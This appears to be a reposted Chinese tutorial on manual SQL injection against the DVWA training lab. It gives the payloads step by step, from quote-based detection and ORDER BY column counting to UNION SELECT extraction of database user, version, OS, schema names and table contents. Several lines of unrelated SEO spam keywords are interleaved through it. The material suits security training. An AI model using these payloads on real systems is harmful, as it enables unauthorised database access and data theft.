DVWA之php+mysql手工注入

后端开发|php教程

php+mysql,DVWA,php

后端开发-php教程

这篇文章介绍的内容是关于DVWA之php+mysql手工注入，有着一定的参考价值，现在分享给大家，有需要的朋友可以参考一下

无限搭建卡盟主站源码,vscode 自定义背景图,make命令 ubuntu,tomcat 服务器停止,爬虫注意问题,族谱程序源码 php,葫芦岛seo优化排名报价lzw

dvwa安全级别为low，进入sql injection页面，提示输入user id，输入正确的id，将显示id first name，surname信息。

php 相册源码站长,ubuntu 查看主板命令,tomcat安装时点击闪退,b站盘子爬虫,虚拟主机如何调整php版本,亚马逊seo流量lzw

尝试输入”‘”,返回错误。存在注入点。

在线购买程序源码,vscode编不了c,Ubuntu的编辑,tomcat 远程文件,sqlite3存图片,怎么判断爬虫犯不犯法呢,php左移,seo线上推广广告,手机网站特效,自动关机的网页代码,html官网模板lzw

尝试遍历数据库表，提示输入的值为ID，初步判断为数字类型注入。尝试输入：1 or 1=1，尝试遍历数据库表。结果失败。

DVWA之php+mysql手工注入

1 or 1=1遍历数据库表失败，猜测程序将此处看成了字符型，可尝试输入 1′ or ‘1’=’1 后遍历出数据库中所有内容。下面尝试结合各种不同语句，得到不同结果。

DVWA之php+mysql手工注入

利用order by 语句查询，输入 1’order by 1 – – 页面显示正常，1’order by 2 – – 显示正常，1’order by 3 – – 报错，判断查询结果值为2列。（注意语句中- – 后边有空格，- -之间没有空格）

DVWA之php+mysql手工注入

使用user（），database（），version（）三个内置函数得到数据库的账户名，数据库名称，数据库版本信息，首先参数注入 1′ and 1=2 union select 1,2 – -(- -之间无空格，- -后有空格)。得出first name处显示为查询结果第一列的值，surname处显示为查询结果第二列的值。

DVWA之php+mysql手工注入

在得知显示之后，使用user(),database(),version(),语句 1′ and 1=2 union select user(),database() – – 得到数据库用户以及数据库名称。链接数据库的用户为root@localhost,数据库名称为dvwa。

DVWA之php+mysql手工注入

通过注入1′ and 1=2 union select version（）,database() – – 得到数据库版本为：5.0.90-community-nt。

通过注入：1’and 1=2 union select 1,@@global.version_compile_os from mysql.user –- 获得操作系统信息为win32.

通过注入： 1′ and 1=2 union select 1,schema_name from information_schema.schemata – – 查询mysql数据库，所有数据库名字。这里利用了mysql默认数据库information_scehma,该数据库存储了mysql所有数据库和表的信息。

DVWA之php+mysql手工注入

通过注入 1′ and exists(select * from users) – – 猜解dvwa数据库中表名（该语句中表名为users，该表实际没有存放用户名和密码）

DVWA之php+mysql手工注入

猜解字段名：1′ and exists(select 字段名 from 表名) – – ，这里实际测试字段名first_name和last_name。实际语句 1′ and exists(select first_name from users) – -以及1′ and exists(select last_name from users) – – 猜解字段名。

DVWA之php+mysql手工注入

爆出数据库中字段内容。 1′ and 1=2 union select first_name,last_name from users – – 这里其实如果是存放管理员账户的表，那么用户名和密码就可以爆出了。

源代码

DVWA之php+mysql手工注入

阅读DVWA系统代码之config.inc.php

php+MySQL